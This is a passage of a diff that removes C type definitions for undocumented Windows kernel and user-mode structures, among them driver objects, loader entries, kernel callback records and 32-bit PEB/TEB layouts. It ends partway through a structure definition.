-#define IRP_MJ_DEVICE_CHANGE 0x18
-#define IRP_MJ_QUERY_QUOTA 0x19
-#define IRP_MJ_SET_QUOTA 0x1a
-#define IRP_MJ_PNP 0x1b
-#define IRP_MJ_PNP_POWER IRP_MJ_PNP
-#define IRP_MJ_MAXIMUM_FUNCTION 0x1b
-
-typedef struct _DRIVER_EXTENSION {
-
- //
- // Back pointer to Driver Object
- //
-
- struct _DRIVER_OBJECT *DriverObject;
-
- //
- // The AddDevice entry point is called by the Plug & Play manager
- // to inform the driver when a new device instance arrives that this
- // driver must control.
- //
-
- PVOID AddDevice;
-
- //
- // The count field is used to count the number of times the driver has
- // had its registered reinitialization routine invoked.
- //
-
- ULONG Count;
-
- //
- // The service name field is used by the pnp manager to determine
- // where the driver related info is stored in the registry.
- //
-
- UNICODE_STRING ServiceKeyName;
-
-} DRIVER_EXTENSION, *PDRIVER_EXTENSION;
-
-#define DRVO_UNLOAD_INVOKED 0x00000001
-#define DRVO_LEGACY_DRIVER 0x00000002
-#define DRVO_BUILTIN_DRIVER 0x00000004 // Driver objects for Hal, PnP Mgr
-#define DRVO_REINIT_REGISTERED 0x00000008
-#define DRVO_INITIALIZED 0x00000010
-#define DRVO_BOOTREINIT_REGISTERED 0x00000020
-#define DRVO_LEGACY_RESOURCES 0x00000040
-// end_ntddk end_nthal end_ntifs end_ntosp
-#define DRVO_BASE_FILESYSTEM_DRIVER 0x00000080 // A driver that is at the bottom of the filesystem stack.
-// begin_ntddk begin_nthal begin_ntifs begin_ntosp
-
-typedef struct _DRIVER_OBJECT {
- CSHORT Type;
- CSHORT Size;
-
- //
- // The following links all of the devices created by a single driver
- // together on a list, and the Flags word provides an extensible flag
- // location for driver objects. 
- //
-
- PDEVICE_OBJECT DeviceObject;
- ULONG Flags;
-
- //
- // The following section describes where the driver is loaded. The count
- // field is used to count the number of times the driver has had its
- // registered reinitialization routine invoked.
- //
-
- PVOID DriverStart;
- ULONG DriverSize;
- PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY
- PDRIVER_EXTENSION DriverExtension;
-
- //
- // The driver name field is used by the error log thread
- // determine the name of the driver that an I/O request is/was bound.
- //
-
- UNICODE_STRING DriverName;
-
- //
- // The following section is for registry support. Thise is a pointer
- // to the path to the hardware information in the registry
- //
-
- PUNICODE_STRING HardwareDatabase;
-
- //
- // The following section contains the optional pointer to an array of
- // alternate entry points to a driver for "fast I/O" support. Fast I/O
- // is performed by invoking the driver routine directly with separate
- // parameters, rather than using the standard IRP call mechanism. Note
- // that these functions may only be used for synchronous I/O, and when
- // the file is cached.
- //
-
- PFAST_IO_DISPATCH FastIoDispatch;
-
- //
- // The following section describes the entry points to this particular
- // driver. Note that the major function dispatch table must be the last
- // field in the object so that it remains extensible. 
- //
-
- PVOID DriverInit;
- PVOID DriverStartIo;
- PVOID DriverUnload;
- PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];
-
-} DRIVER_OBJECT;
-typedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;
-
-#define RESOURCE_TYPE_LEVEL 0
-#define RESOURCE_NAME_LEVEL 1
-#define RESOURCE_LANGUAGE_LEVEL 2
-#define RESOURCE_DATA_LEVEL 3
-
-typedef struct _LDR_RESOURCE_INFO {
- ULONG_PTR Type;
- ULONG_PTR Name;
- ULONG Lang;
-} LDR_RESOURCE_INFO, *PLDR_RESOURCE_INFO;
-
-typedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {
- LIST_ENTRY InLoadOrderLinks;
- LIST_ENTRY InMemoryOrderLinks;
- union
- {
- LIST_ENTRY InInitializationOrderLinks;
- LIST_ENTRY InProgressLinks;
- } DUMMYUNION0;
- PVOID DllBase;
- PVOID EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STRING FullDllName;
- UNICODE_STRING BaseDllName;
- union
- {
- ULONG Flags;
- struct
- {
- ULONG PackagedBinary : 1; // Size=4 Offset=104 BitOffset=0 BitCount=1
- ULONG MarkedForRemoval : 1; // Size=4 Offset=104 BitOffset=1 BitCount=1
- ULONG ImageDll : 1; // Size=4 Offset=104 BitOffset=2 BitCount=1
- ULONG LoadNotificationsSent : 1; // Size=4 Offset=104 BitOffset=3 BitCount=1
- ULONG TelemetryEntryProcessed : 1; // Size=4 Offset=104 BitOffset=4 BitCount=1
- ULONG ProcessStaticImport : 1; // Size=4 Offset=104 BitOffset=5 BitCount=1
- ULONG InLegacyLists : 1; // Size=4 Offset=104 BitOffset=6 BitCount=1
- ULONG InIndexes : 1; // Size=4 Offset=104 BitOffset=7 BitCount=1
- ULONG ShimDll : 1; // Size=4 Offset=104 BitOffset=8 BitCount=1
- ULONG InExceptionTable : 1; // Size=4 Offset=104 BitOffset=9 BitCount=1
- ULONG ReservedFlags1 : 2; // Size=4 Offset=104 BitOffset=10 BitCount=2
- ULONG LoadInProgress : 1; // Size=4 Offset=104 BitOffset=12 BitCount=1
- ULONG LoadConfigProcessed : 1; // Size=4 Offset=104 BitOffset=13 BitCount=1
- ULONG EntryProcessed : 1; // Size=4 Offset=104 BitOffset=14 BitCount=1
- ULONG ProtectDelayLoad : 1; // Size=4 Offset=104 BitOffset=15 BitCount=1
- ULONG ReservedFlags3 : 2; // Size=4 Offset=104 BitOffset=16 BitCount=2 
- ULONG DontCallForThreads : 1; // Size=4 Offset=104 BitOffset=18 BitCount=1
- ULONG ProcessAttachCalled : 1; // Size=4 Offset=104 BitOffset=19 BitCount=1
- ULONG ProcessAttachFailed : 1; // Size=4 Offset=104 BitOffset=20 BitCount=1
- ULONG CorDeferredValidate : 1; // Size=4 Offset=104 BitOffset=21 BitCount=1
- ULONG CorImage : 1; // Size=4 Offset=104 BitOffset=22 BitCount=1
- ULONG DontRelocate : 1; // Size=4 Offset=104 BitOffset=23 BitCount=1
- ULONG CorILOnly : 1; // Size=4 Offset=104 BitOffset=24 BitCount=1
- ULONG ChpeImage : 1; // Size=4 Offset=104 BitOffset=25 BitCount=1
- ULONG ReservedFlags5 : 2; // Size=4 Offset=104 BitOffset=26 BitCount=2
- ULONG Redirected : 1; // Size=4 Offset=104 BitOffset=28 BitCount=1
- ULONG ReservedFlags6 : 2; // Size=4 Offset=104 BitOffset=29 BitCount=2
- ULONG CompatDatabaseProcessed : 1; // Size=4 Offset=104 BitOffset=31 BitCount=1
- };
- } ENTRYFLAGSUNION;
- WORD ObsoleteLoadCount;
- WORD TlsIndex;
- union
- {
- LIST_ENTRY HashLinks;
- struct
- {
- PVOID SectionPointer;
- ULONG CheckSum;
- };
- } DUMMYUNION1;
- union
- {
- ULONG TimeDateStamp;
- PVOID LoadedImports;
- } DUMMYUNION2;
- //fields below removed for compatibility
-} LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE;
-typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;
-typedef LDR_DATA_TABLE_ENTRY_COMPATIBLE *PLDR_DATA_TABLE_ENTRY;
-typedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY;
-
-typedef struct _LDR_DLL_LOADED_NOTIFICATION_DATA {
- ULONG Flags; //Reserved.
- PCUNICODE_STRING FullDllName; //The full path name of the DLL module.
- PCUNICODE_STRING BaseDllName; //The base file name of the DLL module.
- PVOID DllBase; //A pointer to the base address for the DLL in memory.
- ULONG SizeOfImage; //The size of the DLL image, in bytes.
-} LDR_DLL_LOADED_NOTIFICATION_DATA, *PLDR_DLL_LOADED_NOTIFICATION_DATA;
-
-typedef struct _LDR_DLL_UNLOADED_NOTIFICATION_DATA {
- ULONG Flags; //Reserved. 
- PCUNICODE_STRING FullDllName; //The full path name of the DLL module.
- PCUNICODE_STRING BaseDllName; //The base file name of the DLL module.
- PVOID DllBase; //A pointer to the base address for the DLL in memory.
- ULONG SizeOfImage; //The size of the DLL image, in bytes.
-} LDR_DLL_UNLOADED_NOTIFICATION_DATA, *PLDR_DLL_UNLOADED_NOTIFICATION_DATA;
-
-typedef union _LDR_DLL_NOTIFICATION_DATA {
- LDR_DLL_LOADED_NOTIFICATION_DATA Loaded;
- LDR_DLL_UNLOADED_NOTIFICATION_DATA Unloaded;
-} LDR_DLL_NOTIFICATION_DATA, *PLDR_DLL_NOTIFICATION_DATA;
-typedef const LDR_DLL_NOTIFICATION_DATA *PCLDR_DLL_NOTIFICATION_DATA;
-
-#define LDR_DLL_NOTIFICATION_REASON_LOADED 1
-#define LDR_DLL_NOTIFICATION_REASON_UNLOADED 2
-
-typedef enum _LDR_DLL_LOAD_REASON {
- LoadReasonStaticDependency,
- LoadReasonStaticForwarderDependency,
- LoadReasonDynamicForwarderDependency,
- LoadReasonDelayloadDependency,
- LoadReasonDynamicLoad,
- LoadReasonAsImageLoad,
- LoadReasonAsDataLoad,
- LoadReasonEnclavePrimary,
- LoadReasonEnclaveDependency,
- LoadReasonUnknown = -1
-} LDR_DLL_LOAD_REASON, *PLDR_DLL_LOAD_REASON;
-
-/*
-* WDM END
-*/
-
-
-/*
-** Callbacks START
-*/
-
-typedef struct _EX_CALLBACK {
- EX_FAST_REF RoutineBlock;
-} EX_CALLBACK, *PEX_CALLBACK;
-
-typedef struct _EX_CALLBACK_ROUTINE_BLOCK {
- EX_RUNDOWN_REF RundownProtect;
- PVOID Function; //PEX_CALLBACK_FUNCTION
- PVOID Context;
-} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;
-
-typedef struct _KBUGCHECK_CALLBACK_RECORD {
- LIST_ENTRY Entry;
- PVOID CallbackRoutine;
- PVOID Buffer;
- ULONG Length;
- PUCHAR Component;
- ULONG_PTR Checksum;
- UCHAR State;
-} KBUGCHECK_CALLBACK_RECORD, *PKBUGCHECK_CALLBACK_RECORD;
-
-typedef enum _KBUGCHECK_CALLBACK_REASON {
- KbCallbackInvalid,
- KbCallbackReserved1,
- KbCallbackSecondaryDumpData,
- KbCallbackDumpIo,
- KbCallbackAddPages,
- KbCallbackSecondaryMultiPartDumpData,
- KbCallbackRemovePages,
- KbCallbackTriageDumpData
-} KBUGCHECK_CALLBACK_REASON;
-
-typedef struct 
_KBUGCHECK_REASON_CALLBACK_RECORD {
- LIST_ENTRY Entry;
- PVOID CallbackRoutine;
- PUCHAR Component;
- ULONG_PTR Checksum;
- KBUGCHECK_CALLBACK_REASON Reason;
- UCHAR State;
-} KBUGCHECK_REASON_CALLBACK_RECORD, *PKBUGCHECK_REASON_CALLBACK_RECORD;
-
-typedef struct _CM_CALLBACK_CONTEXT_BLOCK {
- LIST_ENTRY CallbackListEntry;
- LIST_ENTRY PreCallListHead;
- PVOID Unknown1;
- PVOID Function; //PEX_CALLBACK_FUNCTION
- UNICODE_STRING Altitude;
- LIST_ENTRY ObjectContextListHead;
-} CM_CALLBACK_CONTEXT_BLOCK, *PCM_CALLBACK_CONTEXT_BLOCK;
-
-typedef struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION {
- struct _SEP_LOGON_SESSION_TERMINATED_NOTIFICATION *Next;
- PVOID CallbackRoutine; //PSE_LOGON_SESSION_TERMINATED_ROUTINE
-} SEP_LOGON_SESSION_TERMINATED_NOTIFICATION, *PSEP_LOGON_SESSION_TERMINATED_NOTIFICATION;
-
-typedef struct _NOTIFICATION_PACKET {
- LIST_ENTRY ListEntry;
- PVOID DriverObject; //PDRIVER_OBJECT
- PVOID NotificationRoutine; //PDRIVER_FS_NOTIFICATION
-} NOTIFICATION_PACKET, *PNOTIFICATION_PACKET;
-
-typedef struct _SHUTDOWN_PACKET {
- LIST_ENTRY ListEntry;
- PVOID DeviceObject; //PDEVICE_OBJECT
-} SHUTDOWN_PACKET, *PSHUTDOWN_PACKET;
-
-#define EX_CALLBACK_SIGNATURE 'llaC'
-
-typedef struct _CALLBACK_OBJECT {
- ULONG Signature;
- KSPIN_LOCK Lock;
- LIST_ENTRY RegisteredCallbacks;
- BOOLEAN AllowMultipleCallbacks;
- UCHAR reserved[3];
-} CALLBACK_OBJECT, *PCALLBACK_OBJECT;
-
-typedef struct _CALLBACK_REGISTRATION {
- LIST_ENTRY Link;
- PCALLBACK_OBJECT CallbackObject;
- PVOID CallbackFunction; //PCALLBACK_FUNCTION
- PVOID CallbackContext;
- ULONG Busy;
- BOOLEAN UnregisterWaiting;
-} CALLBACK_REGISTRATION, *PCALLBACK_REGISTRATION;
-
-typedef ULONG OB_OPERATION;
-
-typedef struct _OB_CALLBACK_CONTEXT_BLOCK {
- LIST_ENTRY CallbackListEntry;
- OB_OPERATION Operations;
- ULONG Flags;
- PVOID Registration; //POB_CALLBACK_REGISTRATION
- POBJECT_TYPE ObjectType;
- PVOID PreCallback; //POB_PRE_OPERATION_CALLBACK
- PVOID PostCallback; //POB_POST_OPERATION_CALLBACK
- 
EX_RUNDOWN_REF RundownReference;
-} OB_CALLBACK_CONTEXT_BLOCK, *POB_CALLBACK_CONTEXT_BLOCK;
-
-typedef struct _OB_OPERATION_REGISTRATION {
- PVOID *ObjectType;
- OB_OPERATION Operations;
- PVOID PreOperation;
- PVOID PostOperation;
-} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;
-
-typedef struct _OB_CALLBACK_REGISTRATION {
- USHORT Version;
- USHORT OperationRegistrationCount;
- UNICODE_STRING Altitude;
- PVOID RegistrationContext;
- OB_OPERATION_REGISTRATION *OperationRegistration;
-} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;
-
-#define PO_POWER_SETTINGS_REGISTRATION_TAG 'teSP'
-
-typedef struct _POP_POWER_SETTING_REGISTRATION_V1 {
- LIST_ENTRY Link;
- ULONG Tag;
- PVOID CallbackThread; //PKTHREAD
- UCHAR UnregisterOnReturn;
- UCHAR UnregisterPending;
- GUID Guid;
- PVOID LastValue; //PPOP_POWER_SETTING_VALUE
- PVOID Callback;
- PVOID Context;
- PDEVICE_OBJECT DeviceObject;
-} POP_POWER_SETTING_REGISTRATION_V1, *PPOP_POWER_SETTING_REGISTRATION_V1;
-
-//
-// WARNING: this structure definition is incomplete.
-// Tail is incorrect/incomplete for newest Win10 versions. 
-//
-typedef struct _POP_POWER_SETTING_REGISTRATION_V2 {
- LIST_ENTRY Link;
- ULONG Tag;
- PVOID CallbackThread; //PKTHREAD
- UCHAR UnregisterOnReturn;
- UCHAR UnregisterPending;
- GUID Guid;
- GUID Guid2;
- PVOID LastValue; //PPOP_POWER_SETTING_VALUE
- PVOID Callback;
- PVOID Context;
- PDEVICE_OBJECT DeviceObject;
-} POP_POWER_SETTING_REGISTRATION_V2, *PPOP_POWER_SETTING_REGISTRATION_V2;
-
-typedef struct _RTL_CALLBACK_REGISTER {
- ULONG Flags;
- EX_RUNDOWN_REF RundownReference;
- PVOID DebugPrintCallback;
- LIST_ENTRY ListEntry;
-} RTL_CALLBACK_REGISTER, *PRTL_CALLBACK_REGISTER;
-
-/*
-** Callbacks END
-*/
-
-/*
-* NTQSI Modules START
-*/
-
-typedef struct _RTL_PROCESS_MODULE_INFORMATION {
- HANDLE Section;
- PVOID MappedBase;
- PVOID ImageBase;
- ULONG ImageSize;
- ULONG Flags;
- USHORT LoadOrderIndex;
- USHORT InitOrderIndex;
- USHORT LoadCount;
- USHORT OffsetToFileName;
- UCHAR FullPathName[256];
-} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;
-
-typedef struct _RTL_PROCESS_MODULE_INFORMATION_EX {
- USHORT NextOffset;
- RTL_PROCESS_MODULE_INFORMATION BaseInfo;
- ULONG ImageChecksum;
- ULONG TimeDateStamp;
- PVOID DefaultBase;
-} RTL_PROCESS_MODULE_INFORMATION_EX, *PRTL_PROCESS_MODULE_INFORMATION_EX;
-
-typedef struct _RTL_PROCESS_MODULES {
- ULONG NumberOfModules;
- RTL_PROCESS_MODULE_INFORMATION Modules[1];
-} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;
-
-/*
-* NTQSI Modules END
-*/
-
-/*
-** Virtual Memory START
-*/
-
-typedef enum _MEMORY_INFORMATION_CLASS {
- MemoryBasicInformation,
- MemoryWorkingSetInformation,
- MemoryMappedFilenameInformation,
- MemoryRegionInformation,
- MemoryWorkingSetExInformation,
- MemorySharedCommitInformation,
- MemoryImageInformation,
- MemoryRegionInformationEx,
- MemoryPrivilegedBasicInformation,
- MemoryEnclaveImageInformation,
- MemoryBasicInformationCapped
-} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;
-
-typedef enum _VIRTUAL_MEMORY_INFORMATION_CLASS {
- VmPrefetchInformation,
- 
VmPagePriorityInformation,
- VmCfgCallTargetInformation,
- VmPageDirtyStateInformation
-} VIRTUAL_MEMORY_INFORMATION_CLASS;
-
-typedef struct _MEMORY_REGION_INFORMATION {
- PVOID AllocationBase;
- ULONG AllocationProtect;
- union
- {
- ULONG RegionType;
- struct
- {
- ULONG Private : 1;
- ULONG MappedDataFile : 1;
- ULONG MappedImage : 1;
- ULONG MappedPageFile : 1;
- ULONG MappedPhysical : 1;
- ULONG DirectMapped : 1;
- ULONG SoftwareEnclave : 1;
- ULONG PageSize64K : 1;
- ULONG Reserved : 24;
- };
- };
- SIZE_T RegionSize;
- //SIZE_T CommitSize;
-} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;
-
-typedef struct _MEMORY_RANGE_ENTRY {
- PVOID VirtualAddress;
- SIZE_T NumberOfBytes;
-} MEMORY_RANGE_ENTRY, *PMEMORY_RANGE_ENTRY;
-
-/*
-** Virtual Memory END
-*/
-
-/*
-** System Firmware START
-*/
-
-typedef enum _SYSTEM_FIRMWARE_TABLE_ACTION {
- SystemFirmwareTable_Enumerate,
- SystemFirmwareTable_Get,
- SystemFirmwareTableMax
-} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;
-
-typedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {
- ULONG ProviderSignature;
- SYSTEM_FIRMWARE_TABLE_ACTION Action;
- ULONG TableID;
- ULONG TableBufferLength;
- UCHAR TableBuffer[ANYSIZE_ARRAY];
-} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;
-
-/*
-** System Firmware END
-*/
-
-//
-// PEB/TEB
-//
-#define GDI_HANDLE_BUFFER_SIZE32 34
-#define GDI_HANDLE_BUFFER_SIZE64 60
-
-#if !defined(_M_X64)
-#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE32
-#else
-#define GDI_HANDLE_BUFFER_SIZE GDI_HANDLE_BUFFER_SIZE64
-#endif
-
-typedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];
-typedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];
-typedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];
-
-#define RTL_MAX_DRIVE_LETTERS 32
-#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001
-
-#define GDI_MAX_HANDLE_COUNT 0x4000
-
-// 32-bit definitions
-typedef struct _STRING32 {
- USHORT Length;
- USHORT MaximumLength;
- ULONG Buffer;
-} 
STRING32;
-typedef STRING32 *PSTRING32;
-
-typedef STRING32 UNICODE_STRING32;
-
-#if (_MSC_VER < 1300) && !defined(_WINDOWS_)
-typedef struct LIST_ENTRY32 {
- DWORD Flink;
- DWORD Blink;
-} LIST_ENTRY32;
-typedef LIST_ENTRY32 *PLIST_ENTRY32;
-
-typedef struct LIST_ENTRY64 {
- ULONGLONG Flink;
- ULONGLONG Blink;
-} LIST_ENTRY64;
-typedef LIST_ENTRY64 *PLIST_ENTRY64;
-#endif
-
-#define WOW64_POINTER(Type) ULONG
-
-typedef struct _PEB_LDR_DATA32 {
- ULONG Length;
- BOOLEAN Initialized;
- WOW64_POINTER(HANDLE) SsHandle;
- LIST_ENTRY32 InLoadOrderModuleList;
- LIST_ENTRY32 InMemoryOrderModuleList;
- LIST_ENTRY32 InInitializationOrderModuleList;
- WOW64_POINTER(PVOID) EntryInProgress;
- BOOLEAN ShutdownInProgress;
- WOW64_POINTER(HANDLE) ShutdownThreadId;
-} PEB_LDR_DATA32, *PPEB_LDR_DATA32;
-
-#define LDR_DATA_TABLE_ENTRY_SIZE_WINXP32 FIELD_OFFSET( LDR_DATA_TABLE_ENTRY32, ForwarderLinks )
-
-typedef struct _LDR_DATA_TABLE_ENTRY32 {
- LIST_ENTRY32 InLoadOrderLinks;
- LIST_ENTRY32 InMemoryOrderLinks;
- LIST_ENTRY32 InInitializationOrderLinks;
- WOW64_POINTER(PVOID) DllBase;
- WOW64_POINTER(PVOID) EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STRING32 FullDllName;
- UNICODE_STRING32 BaseDllName;
- ULONG Flags;
- USHORT LoadCount;
- USHORT TlsIndex;
- union
- {
- LIST_ENTRY32 HashLinks;
- struct
- {
- WOW64_POINTER(PVOID) SectionPointer;
- ULONG CheckSum;
- };
- };
- union
- {
- ULONG TimeDateStamp;
- WOW64_POINTER(PVOID) LoadedImports;
- };
- WOW64_POINTER(PVOID) EntryPointActivationContext;
- WOW64_POINTER(PVOID) PatchInformation;
- LIST_ENTRY32 ForwarderLinks;
- LIST_ENTRY32 ServiceTagLinks;
- LIST_ENTRY32 StaticLinks;
- WOW64_POINTER(PVOID) ContextInformation;
- WOW64_POINTER(ULONG_PTR) OriginalBase;
- LARGE_INTEGER LoadTime;
-} LDR_DATA_TABLE_ENTRY32, *PLDR_DATA_TABLE_ENTRY32;
-
-typedef struct _CURDIR32 {
- UNICODE_STRING32 DosPath;
- WOW64_POINTER(HANDLE) Handle;
-} CURDIR32, *PCURDIR32;
-
-typedef struct _RTL_DRIVE_LETTER_CURDIR32 {
- USHORT Flags;
- USHORT Length;
- 
ULONG TimeStamp; - STRING32 DosPath; -} RTL_DRIVE_LETTER_CURDIR32, *PRTL_DRIVE_LETTER_CURDIR32; - -typedef struct _RTL_USER_PROCESS_PARAMETERS32 { - ULONG MaximumLength; - ULONG Length; - - ULONG Flags; - ULONG DebugFlags; - - WOW64_POINTER(HANDLE) ConsoleHandle; - ULONG ConsoleFlags; - WOW64_POINTER(HANDLE) StandardInput; - WOW64_POINTER(HANDLE) StandardOutput; - WOW64_POINTER(HANDLE) StandardError; - - CURDIR32 CurrentDirectory; - UNICODE_STRING32 DllPath; - UNICODE_STRING32 ImagePathName; - UNICODE_STRING32 CommandLine; - WOW64_POINTER(PVOID) Environment; - - ULONG StartingX; - ULONG StartingY; - ULONG CountX; - ULONG CountY; - ULONG CountCharsX; - ULONG CountCharsY; - ULONG FillAttribute; - - ULONG WindowFlags; - ULONG ShowWindowFlags; - UNICODE_STRING32 WindowTitle; - UNICODE_STRING32 DesktopInfo; - UNICODE_STRING32 ShellInfo; - UNICODE_STRING32 RuntimeData; - RTL_DRIVE_LETTER_CURDIR32 CurrentDirectories[RTL_MAX_DRIVE_LETTERS]; - - ULONG EnvironmentSize; - ULONG EnvironmentVersion; -} RTL_USER_PROCESS_PARAMETERS32, *PRTL_USER_PROCESS_PARAMETERS32; - -typedef struct _PEB32 { - BOOLEAN InheritedAddressSpace; - BOOLEAN ReadImageFileExecOptions; - BOOLEAN BeingDebugged; - union - { - BOOLEAN BitField; - struct - { - BOOLEAN ImageUsesLargePages : 1; - BOOLEAN IsProtectedProcess : 1; - BOOLEAN IsLegacyProcess : 1; - BOOLEAN IsImageDynamicallyRelocated : 1; - BOOLEAN SkipPatchingUser32Forwarders : 1; - BOOLEAN SpareBits : 3; - }; - }; - WOW64_POINTER(HANDLE) Mutant; - - WOW64_POINTER(PVOID) ImageBaseAddress; - WOW64_POINTER(PPEB_LDR_DATA) Ldr; - WOW64_POINTER(PRTL_USER_PROCESS_PARAMETERS) ProcessParameters; - WOW64_POINTER(PVOID) SubSystemData; - WOW64_POINTER(PVOID) ProcessHeap; - WOW64_POINTER(PRTL_CRITICAL_SECTION) FastPebLock; - WOW64_POINTER(PVOID) AtlThunkSListPtr; - WOW64_POINTER(PVOID) IFEOKey; - union - { - ULONG CrossProcessFlags; - struct - { - ULONG ProcessInJob : 1; - ULONG ProcessInitializing : 1; - ULONG ProcessUsingVEH : 1; - ULONG ProcessUsingVCH : 
1; - ULONG ProcessUsingFTH : 1; - ULONG ProcessPreviouslyThrottled : 1; - ULONG ProcessCurrentlyThrottled : 1; - ULONG ReservedBits0 : 25; - }; - ULONG EnvironmentUpdateCount; - }; - union - { - WOW64_POINTER(PVOID) KernelCallbackTable; - WOW64_POINTER(PVOID) UserSharedInfoPtr; - }; - ULONG SystemReserved[1]; - ULONG AtlThunkSListPtr32; - WOW64_POINTER(PVOID) ApiSetMap; - ULONG TlsExpansionCounter; - WOW64_POINTER(PVOID) TlsBitmap; - ULONG TlsBitmapBits[2]; - WOW64_POINTER(PVOID) ReadOnlySharedMemoryBase; - WOW64_POINTER(PVOID) HotpatchInformation; - WOW64_POINTER(PPVOID) ReadOnlyStaticServerData; - WOW64_POINTER(PVOID) AnsiCodePageData; - WOW64_POINTER(PVOID) OemCodePageData; - WOW64_POINTER(PVOID) UnicodeCaseTableData; - - ULONG NumberOfProcessors; - ULONG NtGlobalFlag; - - LARGE_INTEGER CriticalSectionTimeout; - WOW64_POINTER(SIZE_T) HeapSegmentReserve; - WOW64_POINTER(SIZE_T) HeapSegmentCommit; - WOW64_POINTER(SIZE_T) HeapDeCommitTotalFreeThreshold; - WOW64_POINTER(SIZE_T) HeapDeCommitFreeBlockThreshold; - - ULONG NumberOfHeaps; - ULONG MaximumNumberOfHeaps; - WOW64_POINTER(PPVOID) ProcessHeaps; - - WOW64_POINTER(PVOID) GdiSharedHandleTable; - WOW64_POINTER(PVOID) ProcessStarterHelper; - ULONG GdiDCAttributeList; - - WOW64_POINTER(PRTL_CRITICAL_SECTION) LoaderLock; - - ULONG OSMajorVersion; - ULONG OSMinorVersion; - USHORT OSBuildNumber; - USHORT OSCSDVersion; - ULONG OSPlatformId; - ULONG ImageSubsystem; - ULONG ImageSubsystemMajorVersion; - ULONG ImageSubsystemMinorVersion; - WOW64_POINTER(ULONG_PTR) ImageProcessAffinityMask; - GDI_HANDLE_BUFFER32 GdiHandleBuffer; - WOW64_POINTER(PVOID) PostProcessInitRoutine; - - WOW64_POINTER(PVOID) TlsExpansionBitmap; - ULONG TlsExpansionBitmapBits[32]; - - ULONG SessionId; - - // Rest of structure not included. 
-} PEB32, *PPEB32; - -#define GDI_BATCH_BUFFER_SIZE 310 - -typedef struct _GDI_TEB_BATCH32 { - ULONG Offset; - WOW64_POINTER(ULONG_PTR) HDC; - ULONG Buffer[GDI_BATCH_BUFFER_SIZE]; -} GDI_TEB_BATCH32, *PGDI_TEB_BATCH32; - -#if (_MSC_VER < 1300) && !defined(_WINDOWS_) -// -// 32 and 64 bit specific version for wow64 and the debugger -// -typedef struct _NT_TIB32 { - DWORD ExceptionList; - DWORD StackBase; - DWORD StackLimit; - DWORD SubSystemTib; - union { - DWORD FiberData; - DWORD Version; - }; - DWORD ArbitraryUserPointer; - DWORD Self; -} NT_TIB32, *PNT_TIB32; - -typedef struct _NT_TIB64 { - DWORD64 ExceptionList; - DWORD64 StackBase; - DWORD64 StackLimit; - DWORD64 SubSystemTib; - union { - DWORD64 FiberData; - DWORD Version; - }; - DWORD64 ArbitraryUserPointer; - DWORD64 Self; -} NT_TIB64, *PNT_TIB64; -#endif - -typedef struct _TEB32 { - NT_TIB32 NtTib; - - WOW64_POINTER(PVOID) EnvironmentPointer; - CLIENT_ID32 ClientId; - WOW64_POINTER(PVOID) ActiveRpcHandle; - WOW64_POINTER(PVOID) ThreadLocalStoragePointer; - WOW64_POINTER(PPEB) ProcessEnvironmentBlock; - - ULONG LastErrorValue; - ULONG CountOfOwnedCriticalSections; - WOW64_POINTER(PVOID) CsrClientThread; - WOW64_POINTER(PVOID) Win32ThreadInfo; - ULONG User32Reserved[26]; - ULONG UserReserved[5]; - WOW64_POINTER(PVOID) WOW32Reserved; - LCID CurrentLocale; - ULONG FpSoftwareStatusRegister; - WOW64_POINTER(PVOID) SystemReserved1[54]; - NTSTATUS ExceptionCode; - WOW64_POINTER(PVOID) ActivationContextStackPointer; - BYTE SpareBytes[36]; - ULONG TxFsContext; - - GDI_TEB_BATCH32 GdiTebBatch; - CLIENT_ID32 RealClientId; - WOW64_POINTER(HANDLE) GdiCachedProcessHandle; - ULONG GdiClientPID; - ULONG GdiClientTID; - WOW64_POINTER(PVOID) GdiThreadLocalInfo; - WOW64_POINTER(ULONG_PTR) Win32ClientInfo[62]; - WOW64_POINTER(PVOID) glDispatchTable[233]; - WOW64_POINTER(ULONG_PTR) glReserved1[29]; - WOW64_POINTER(PVOID) glReserved2; - WOW64_POINTER(PVOID) glSectionInfo; - WOW64_POINTER(PVOID) glSection; - WOW64_POINTER(PVOID) 
